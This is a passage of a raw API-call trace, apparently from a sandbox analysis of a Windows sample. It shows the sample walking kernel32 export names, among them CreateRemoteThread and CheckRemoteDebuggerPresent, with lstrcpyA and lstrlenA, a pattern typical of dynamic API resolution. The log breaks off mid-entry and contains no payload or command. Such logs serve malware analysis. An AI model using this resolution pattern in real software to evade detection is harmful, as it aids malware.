[0085.754] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.754] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.754] lstrlenA (lpString="BEEP") returned 4 [0085.754] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.754] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.755] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.755] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.755] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.755] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.755] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.755] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.755] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.755] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.755] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.755] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.755] lstrlenA (lpString="CANCELIO") returned 8 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.755] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.755] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.755] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.755] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.755] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.755] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.755] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.755] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.756] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.756] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.756] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.756] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.756] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.756] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.756] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.756] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.756] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.756] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.756] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.756] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.756] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.756] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.757] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.757] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.757] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.757] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.757] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.757] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.757] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.757] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.757] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.757] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.757] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.757] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.757] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.757] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.757] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.757] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.757] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.757] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.757] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.758] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.758] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.758] lstrlenA (lpString="COPYFILEA") returned 9 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.758] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.758] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.758] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.758] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.758] lstrlenA (lpString="COPYFILEW") returned 9 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.758] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.758] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.758] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.758] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.758] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.758] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.758] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.758] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.758] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.758] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.758] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.758] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.759] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.759] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.759] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.759] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.759] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.759] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.759] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.759] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.759] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.759] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.759] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.759] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.759] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.759] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.759] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.759] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.759] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.759] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.759] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.760] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.760] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.760] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.760] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.760] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.760] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.760] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.760] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.760] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.760] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.760] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.760] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.760] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.760] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.760] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.760] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.760] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.760] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.760] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.761] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.761] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.761] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.761] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.761] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.761] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.761] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.761] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.761] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.761] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.761] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.761] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.761] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.761] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.761] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.761] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.761] lstrcpyA (in: lpString1=0x3f2cf70, 